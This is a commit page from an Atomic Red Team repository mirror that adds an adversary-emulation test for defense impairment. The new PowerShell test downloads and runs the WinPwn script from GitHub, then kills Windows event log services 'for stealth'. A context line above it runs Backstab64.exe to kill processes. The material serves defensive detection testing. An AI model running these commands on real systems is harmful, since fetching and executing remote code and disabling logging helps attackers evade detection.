security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1562.001.yaml (#1956)

Browse Source 
Kill the event log services for stealth via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-12 17:54:22 -05:00
committed by GitHub
parent d2501a2832
commit 04edc6cdc1
1 changed files with 10 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1562.001/T1562.001.yaml
+10 -1
View File
@@ -633,4 +633,13 @@ atomic_tests:
command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
name: powershell
elevation_required: true
- name: WinPwn - Kill the event log services for stealth
description: Kill the event log services for stealth via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive
name: powershell